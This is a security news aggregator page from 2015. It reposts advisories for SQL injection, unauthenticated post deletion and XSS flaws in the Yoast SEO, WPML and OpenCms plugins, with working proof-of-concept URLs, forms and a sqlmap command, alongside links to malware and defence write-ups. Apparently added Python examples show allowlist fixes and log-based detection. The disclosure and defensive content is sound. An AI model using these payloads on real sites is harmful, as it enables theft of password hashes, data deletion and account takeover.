Channel: BOT24

WordPress SEO by Yoast

Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
Version/s Tested: 1.7.3.3
Patched Version: 1.7.4
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
WPVULNDB: https://wpvulndb.com/vulnerabilities/7841

Description:

WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
to improve the Search Engine Optimization (SEO) of WordPress sites. The
latest version at the time of writing (1.7.3.3) has been found to be
affected by two authenticated (admin, editor or author user) Blind SQL
Injection vulnerabilities. The plugin has more than one million downloads
according to WordPress.

Technical Description:

The authenticated Blind SQL Injection vulnerability can be found within the
'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
parameters are not sufficiently sanitised before being used within a SQL
query.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

$order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );

If the GET orderby parameter value is not empty it will pass its value
through WordPress's own esc_sql() function. According to WordPress this
function 'Prepares a string for use as an SQL query. A glorified
addslashes() that works with arrays.'. However, this is not sufficient to
prevent SQL Injection, as can be seen from our Proof of Concept: the value
is used unquoted in the query's ORDER BY clause, so a payload that contains
no quote characters passes through esc_sql() unchanged.
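To make the point concrete, here is an added example (not code from the advisory or from the plugin) that reproduces the two patterns in Python against an in-memory SQLite table instead of PHP and MySQL: an addslashes()-style escape followed by concatenation into ORDER BY, beside an allowlist check, which is the usual fix for sort columns and directions because identifiers and keywords cannot be passed as bound parameters. The posts table, its rows and the allowlist are constructed for the example.

```python
import sqlite3

# Constructed sample rows standing in for wp_posts (example data, not from the advisory).
ROWS = [
    (1, "Beta post", "2015-03-02"),
    (2, "Alpha post", "2015-03-10"),
    (3, "Gamma post", "2015-03-01"),
]

# Columns a user may legitimately sort by, and the only two directions (assumed allowlist).
ALLOWED_ORDERBY = {"post_title", "post_date", "ID"}
ALLOWED_ORDER = {"ASC", "DESC"}


def addslashes(value: str) -> str:
    """Emulates PHP addslashes(), which is what esc_sql() amounts to for a
    plain string: backslash-escape quotes, backslashes and NUL bytes."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\0", "\\0"))


def build_query_escaped(orderby: str, order: str) -> str:
    """The vulnerable pattern from lines 529/533: escape, then concatenate.
    The identifier is never quoted in the query, so escaping quote
    characters changes nothing for a value that contains none."""
    orderby = addslashes(orderby) if orderby else "post_title"
    order = addslashes(order.upper())
    return f"SELECT ID, post_title FROM posts ORDER BY {orderby} {order}"


def build_query_allowlisted(orderby: str, order: str) -> str:
    """Hardened pattern: match the column and direction against a fixed
    allowlist and fall back to a safe default for anything else."""
    if orderby not in ALLOWED_ORDERBY:
        orderby = "post_title"
    order = order.upper()
    if order not in ALLOWED_ORDER:
        order = "ASC"
    return f"SELECT ID, post_title FROM posts ORDER BY {orderby} {order}"


def run(sql: str) -> list:
    """Executes a query against a fresh in-memory copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (ID INTEGER, post_title TEXT, post_date TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", ROWS)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    # A sort value with an extra expression appended and no quote characters:
    # the escaped version keeps it verbatim, the allowlisted version drops it.
    tainted = "post_date,(select count(*) from posts)"
    print(build_query_escaped(tainted, "asc"))
    print(build_query_allowlisted(tainted, "asc"))
```

Running the module prints both queries for the tainted value; run() shows that the escaped one is still accepted and executed by the database, which is exactly why the advisory's sleep() payload works, while the allowlisted one sorts by the safe default.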

Proof of Concept (PoC):

The following GET request will cause the SQL query to execute and sleep for
10 seconds if clicked on as an authenticated admin, editor or author user.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc

Using SQLMap:

python sqlmap.py -u "http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc" --batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; wordpress_logged_in_9dee67...;"

Impact:

As there is no anti-CSRF protection, a remote unauthenticated attacker could
use this vulnerability to execute arbitrary SQL queries on the victim
WordPress web site by enticing an authenticated admin, editor or author
user to click on a specially crafted link or visit a page they control.

One possible attack scenario would be an attacker adding their own
administrative user to the target WordPress site, allowing them to
compromise the entire web site.

Timeline:

March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
(WPScan Team - Dewhurst Security).
March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
March 10th 2015 - 20:00 GMT: Vendor contacted via email.
March 10th 2015 - 21:25 GMT: Vendor replies, confirms the issue and gives an
expected patch timeline.
March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
this issue.
March 11th 2015 - 12:30 GMT: Advisory released.

Foreign LINUX

Foreign LINUX is a dynamic binary translator and a Linux system call interface emulator for the Windows platform. It is capable of running unmodified Linux binaries on Windows without any drivers or modifications to the system. This provides another way of running Linux applications under Windows, in contrast to Cygwin and other tools.

more here..........https://github.com/wishstudio/flinux

Security Issue: Combining Bcrypt With Other Hash Functions

The other day, I was directed at an interesting question on StackOverflow asking if password_verify() was safe against DoS attacks using extremely long passwords. Many hashing algorithms depend on the amount of data fed into them, which affects their runtime. This can lead to a DoS attack where an attacker can provide an exceedingly long password and tie up computer resources. It's a really good question to ask of Bcrypt (and password_hash). As you may know, Bcrypt is limited to 72 character passwords. So on the surface it looks like it shouldn't be vulnerable. But I chose to dig in further to be sure. What I found surprised me.

more here........http://blog.ircmaxell.com/2015/03/security-issue-combining-bcrypt-with.html

WPML WordPress plug-in SQL injection etc.

*OVERVIEW*

WPML is the industry standard for creating multi-lingual WordPress sites.
Three vulnerabilities were found in the plug-in. The most serious of them,
an SQL injection problem, allows anyone to read the contents of the
WordPress database, including user details and password hashes, without
authentication.

System administrators should update to version 3.1.9.1 released earlier
this week to resolve the issues.



*DETAILS*

*1. SQL injection*
When WPML processes an HTTP POST request containing the parameter
"action=wp-link-ajax", the current language is determined by parsing the
HTTP referer. The parsed language code is neither checked for validity nor
SQL-escaped. The user doesn't need to be logged in.

By sending a carefully crafted referer value with the mentioned POST
request parameter, an attacker can perform SQL queries on arbitrary tables
and retrieve their results. In addition to the standard WordPress database
and tables, the attacker may query all other databases and tables
accessible to the web backend.

The following HTML snippet demonstrates the vulnerability:

<script>
var union = "select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users";
if (document.location.search.length < 2)
    document.location.search = "lang=xx' UNION " + union + " -- -- ";
</script>
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
<input type=hidden name=action value="wp-link-ajax">
<input type=submit>
</form>

The results of the SQL query are returned, XML-formatted, in the comments
feed.
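An added example for the issue just described (not code from the advisory or from WPML), in Python rather than PHP: the missing validation of the language code, written as a strict allowlist regex, and the same check used as detection logic over web server access logs. The POST body carrying action=wp-link-ajax is not logged, but the Referer header is, so a referer whose lang parameter is not a plausible language code is the signal to look for. The log lines, hostnames and the exact language-code format are constructed assumptions for the example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (sample data, not from the advisory).
# The first one mirrors the advisory's referer-borne payload, percent-encoded as a
# browser would send it; the others are ordinary traffic.
SAMPLE_LOG = r'''
203.0.113.5 - - [10/Mar/2015:10:01:02 +0000] "POST /comments/feed HTTP/1.1" 200 1843 "https://blog.example/?lang=xx%27%20UNION%20select%20user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12%20from%20wp_users%20--%20--%20" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2015:10:02:15 +0000] "POST /comments/feed HTTP/1.1" 200 1843 "https://blog.example/?lang=fi" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2015:10:03:44 +0000] "GET /?lang=de HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.6 - - [10/Mar/2015:10:04:01 +0000] "POST /comments/feed HTTP/1.1" 200 1843 "https://blog.example/?lang=zh-hans" "Mozilla/5.0"
'''.strip().splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed shape of a language code: two or three lowercase letters, optionally
# followed by a short region or script subtag. Anything else is rejected rather
# than escaped, which is the check the advisory says was missing.
LANG_RE = re.compile(r"^[a-z]{2,3}(-[a-z0-9]{2,8})?$")


def is_valid_lang_code(code: str) -> bool:
    """Allowlist validation of a language code taken from untrusted input."""
    return bool(LANG_RE.fullmatch(code))


def lang_from_referer(referer: str) -> Optional[str]:
    """Extracts the lang query parameter from a Referer value the way the
    vulnerable code does, but treats the result as untrusted input."""
    if not referer or referer == "-":
        return None
    values = parse_qs(urlsplit(referer).query, keep_blank_values=True).get("lang")
    return values[0] if values else None


def scan(lines):
    """Returns (client IP, lang value) for every request whose Referer carried
    a lang parameter that fails validation; those are the requests to investigate."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        lang = lang_from_referer(m.group("referer"))
        if lang is not None and not is_valid_lang_code(lang):
            hits.append((m.group("ip"), lang))
    return hits


if __name__ == "__main__":
    for ip, lang in scan(SAMPLE_LOG):
        print(f"suspicious lang value from {ip}: {lang!r}")
```

Only the first sample line is reported; "fi", "de" and "zh-hans" pass. The same is_valid_lang_code() check, applied before the value reaches a query, is the fix-side counterpart: a language code that matches the pattern cannot carry SQL syntax, so there is nothing left for escaping to miss.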


*2. Page/post/menu deletion*

WPML contains a ”menu sync” function which helps site administrators to
keep WordPress menus consistent across different languages. This
functionality lacked any access control, allowing anyone to delete
practically all content of the website - posts, pages, and menus.
Example:

<form method=POST action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">
<input type=hidden name="action" value="icl_msync_confirm">
<input type=text name="sync" size=50 value="del[x][y][12345]=z">
<input type=submit>
</form>

Submitting the above form would delete the row with the ID 12345 from the
wp_posts database table. Several items can be deleted with the same request.



*3. Reflected XSS*

The "reminder popup" code intended for administrators in WPML didn't check
for login status or nonce. An attacker can direct target users to a URL
like:

https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f


to execute JavaScript in their browser. This example bypasses the Chrome
XSS Auditor.
In the case of WordPress, XSS triggered by an administrator can lead to
server-side compromise via the plugin and theme editors.
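As an added illustration (not code from the advisory or from WPML, and in Python rather than PHP), here is the kind of check the target parameter of such a popup needs before it is used as a link or redirect destination: decode, refuse control characters that browsers strip out of scheme names, and then accept only a site-relative path or an absolute http(s) URL on the site's own host. The function name, the host name and the rule that relative targets must start with a single slash are assumptions for the example.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}


def is_safe_popup_target(target: str, site_host: str) -> bool:
    """Returns True only for a site-relative path ("/...") or an absolute
    http(s) URL whose host is site_host. Decodes first, because the
    advisory's payload arrives percent-encoded as javascript%3A..., and
    rejects any remaining whitespace or control characters, since browsers
    strip those out of a scheme (so "java<TAB>script:" would still run)."""
    decoded = unquote(target).strip()
    if not decoded or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in decoded):
        return False
    parts = urlsplit(decoded)
    if not parts.scheme and not parts.netloc:
        # Site-relative path: one leading slash, never "//host" (scheme-relative).
        return decoded.startswith("/") and not decoded.startswith("//")
    return (parts.scheme.lower() in ALLOWED_SCHEMES
            and parts.hostname is not None
            and parts.hostname == site_host.lower())


if __name__ == "__main__":
    for candidate in ("/wp-admin/", "https://blog.example/wp-admin/",
                      "javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f",
                      "//evil.example/", "java\tscript:alert(1)"):
        print(f"{candidate!r}: {is_safe_popup_target(candidate, 'blog.example')}")
```

The scheme check is an allowlist, not a search for the string "javascript", so data:, vbscript: and any scheme invented later are rejected for free. The login and nonce checks the advisory mentions are separate and still required; this only addresses what the target value may contain.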



*CREDITS*

The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
researching WordPress plugins falling in the scope of the Facebook bug
bounty program.

The vendor was notified on March 02, 2015 and the patch was released on
March 10.

Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/

An up-to-date version of this document can be found on our website
http://klikki.fi .

Integer Overflow Prevention in C

Integer overflows are known bugs in C which can lead to exploitable vulnerabilities.
more here......https://splone.com/blog/2015/3/11/integer-overflow-prevention-in-c

Alkacon OpenCms 9.5.1 Multiple XSS Vulnerabilities

Product: OpenCms
Vendor: Alkacon Software
Vulnerable Version(s): 9.5.1 and probably prior
Tested Version: 9.5.1
Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/opencms-core/issues/304)
Vendor Patch: Not Yet (No Specific Time-line)
Public Disclosure: Mar 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Not Yet (https://github.com/alkacon/opencms-core/)
Discovered and Credits: Rehan Ahmed (knight_rehan@hotmail.com)

_______________________________________________________________________________________________________________________
Overview
_______________________________________________________________________________________________________________________

Alkacon OpenCms 9.5.1 and prior versions are prone to multiple cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
_______________________________________________________________________________________________________________________
Vendor's Description of Application
_______________________________________________________________________________________________________________________

OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content.
OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g.  Windows NT, IIS, BEA Weblogic, Oracle).
As true open source software, OpenCms is free of licensing costs.

http://www.opencms.org/en/index.html
_______________________________________________________________________________________________________________________
Vulnerability Details & Exploit
_______________________________________________________________________________________________________________________

Method: GET

/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--
/opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//
/opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';</script><script>confirm(0)</script>
/opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";</script><script>confirm(0)</script>

Method: POST

POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://127.0.0.1:8080/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink=null&workplaceresource=&buildframe=true
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104

action=search&query=<iframe src=javascript:confirm(0);&index=German+online+help&searchPage=1&query2=1234

_______________________________________________________________________________________________________________________

Achievement Locked: New Crypto-Ransomware Pwns Video Gamers

Gamers may be used to paying to unlock downloadable content in their favorite games, but a new crypto-ransomware variant aims to make gamers pay to unlock what they already own. Data files for more than 20 games can be affected by the threat, increasing what is already a large target for cybercriminals. Another file type that hasn’t been targeted before is iTunes related. But first, let’s have a look at the initial infection here.........http://labs.bromium.com/2015/03/12/achievement-locked-new-crypto-ransomware-pwns-video-gamers/

Talos Discovery Spotlight: Hundreds of Thousands of Google Apps Domains’ Private WHOIS Information Disclosed

In mid-2013, a problem occurred that slowly began unmasking the hidden registration information for owners’ domains that had opted into WHOIS privacy protection. These domains all appear to be registered via Google Apps [1], using eNom as a registrar. At the time of writing this blog, there are 305,925 domains registered via Google’s partnership with eNom. 282,867 domains, or roughly 94%, appear to have been affected [2]. (Google reports that new domains which have not faced a renewal period are not affected and many businesses do not opt into their privacy service.) The information disclosed included full names, addresses, phone numbers, and email addresses for each domain. The information was leaked in the form of WHOIS records.

more here..........http://blogs.cisco.com/security/talos/whoisdisclosure

Introducing Masche: memory scanning for server security

Mozilla operates thousands of servers to build products and run services for our users. Keeping these servers secure is the primary concern of the Operations Security team, and the reason why we have built Mozilla InvestiGator (MIG), a cross-platform endpoint security system.

MIG can inspect the file system and network information of thousands of hosts in parallel, which greatly helps increase visibility across the infrastructure. But until recently, it lacked the ability to look into the memory of running processes, a need that often arises during security investigations.

This is where Mozilla Winter of Security team Masche (Memory Analysis Suite for Checking the Harmony of Endpoints) comes into play.

more here........https://blog.mozilla.org/security/2015/03/12/introducing-masche-memory-scanning-for-server-security/

VIRLOCK Combines File Infection and Locks Computer Screens

Ransomware has become one of the biggest problems for end users as of late. In the past months alone, we have reported on several variants of both ransomware and crypto-ransomware, each with their own “unique” routines. We recently came across one malware family, detected as PE_VIRLOCK, that not only locks the computer screen but also infects files—a first for ransomware.

more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/virlock-combines-file-infection-and-ransomware/

Rooting the Transcend WiFi SD card

by injecting commands into the wifi channel config

This exploit requires opening the "Files" page of the card's web interface and escaping to the root of the file system.

more here..........https://gist.github.com/deckar01/6d9b76bdef21eaab0568

Monitoring High-Risk Users with StealthWatch Dashboards

Most businesses trust their own employees, but when an organization deals with sensitive data, security must come first. In such an environment, a worker who has turned in their two weeks’ notice or displayed suspicious behavior may warrant a little extra scrutiny, and not without reason.

more here.........http://www.lancope.com/blog/monitoring-high-risk-users-stealthwatch-dashboards

Bypassing ASLR with CVE-2015-0071: An Out-of-Bounds Read Vulnerability

Almost every Patch Tuesday cycle contains one bulletin that (for convenience) rolls up multiple Internet Explorer vulnerabilities into a single bulletin. February’s Patch Tuesday cumulative IE bulletin (MS15-009) included a fix for a particularly interesting vulnerability that could be used to bypass one of the key anti-exploit technologies in use today, address space layout randomization (ASLR).

This vulnerability was designated CVE-2015-0071. To be used in an attack, this vulnerability must be combined with another one that is capable of actually running code on the affected machines. In attacks seen by iSIGHT, this has been paired with an Adobe Flash vulnerability (CVE-2014-9163), which was fixed in December.

This vulnerability was found in the jscript9.dll module. To analyze this vulnerability, I examined this file (version 9.0.8112.1645) on a Windows 7, 32-bit system here........http://blog.trendmicro.com/trendlabs-security-intelligence/bypassing-aslr-with-cve-2015-0071-an-out-of-bounds-read-vulnerability/

Samsung's Android SNS Exploit

Proof of concept of vulnerabilities in Samsung's SNS application here.......https://github.com/programa-stic/SNS-thief

Diaphora, a program diffing plugin for IDA Pro

Some weeks ago I started developing a binary diffing plugin for IDA Pro (in IDA Python) like Zynamics BinDiff, DarunGrim or Turbo Diff. The reasons to create one more (open source) plugin for such task are various, but the following are the main ones here..........http://joxeankoret.com/blog/2015/03/13/diaphora-a-program-diffing-plugin-for-ida-pro/

Beyond good ol’ Run key, Part 29

LNK files have been used by malware for many years, so there is not much new that can be said about them with regards to persistence.

Examples include:

Placing shortcut files in popular locations (Desktop, Start Menu)
Replacing an .exe path inside the .lnk files with one pointing to a malicious executable (‘man-in-the-middle’, or a variant of a companion virus)
Exploits (as used by Stuxnet)
Etc.
The following examples explore 2 more (but less popular) methods of leveraging LNK files as a persistence mechanism here........http://www.hexacorn.com/blog/2015/03/13/beyond-good-ol-run-key-part-29/

Jamieoliver[dot]com still compromised, now drops digitally signed malware

Almost one month ago we blogged about popular Chef Jamie Oliver having his website hacked and serving malware.

The issue was quickly resolved following our disclosure and Jamie Oliver’s management team issued a public statement:

"The team at jamieoliver.com found a low-level malware problem and dealt with it quickly. The site is now safe to use. We have had only a handful of comments from users over the last couple of days, and no-one has reported any serious issues. We apologise to anyone who was at all worried after going on the site. The Jamie Oliver website is regularly checked for vulnerabilities by both our in-house team and an independent third-party and they quickly deal with anything that is found. The team is confident that no data has been compromised in this incident but if anyone is worried, do please use the contact form on the site."

Sadly, it appears as though the problem has returned, or perhaps was not completely dealt with.

more here......https://blog.malwarebytes.org/exploits-2/2015/03/jamieoliver-com-still-compromised-now-drops-digitally-signed-malware/

107 The Need for Proactive Defense and Threat Hunting Within Organizations - Andrew Case

The video for the presentation is here https://www.youtube.com/watch?v=751bkSD2Nn8&t=1m35s and the slides are here.....http://www.slideshare.net/AndrewDFIR/my-keynote-from-bsidestampa-2015-video-in-description

T-Pot: A Multi-Honeypot Platform

We created a honeypot platform, which is based on the well-established honeypots glastopf, kippo, honeytrap and dionaea, the network IDS/IPS suricata, elasticsearch-logstash-kibana, ewsposter and some docker magic. We want to make this technology available to everyone who is interested and release it as a Community Edition. We want to encourage you to participate.

more here........http://dtag-dev-sec.github.io/mediator/feature/2015/03/11/concept.html


and here........https://github.com/dtag-dev-sec/tpotce

Tango- Honeypot Intelligence with Splunk

Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions. There are two scripts provided which facilitate the installation of the honeypots and/or Splunk Universal Forwarder. One of the scripts uf_only.sh will install the Splunk Universal Forwarder and install the necessary input and output configuration files. The other script sensor.sh will install the Splunk Universal Forwarder along with the Kippo honeypot required for the Tango Honeypot Intelligence app to work.

more here.............https://github.com/aplura/Tango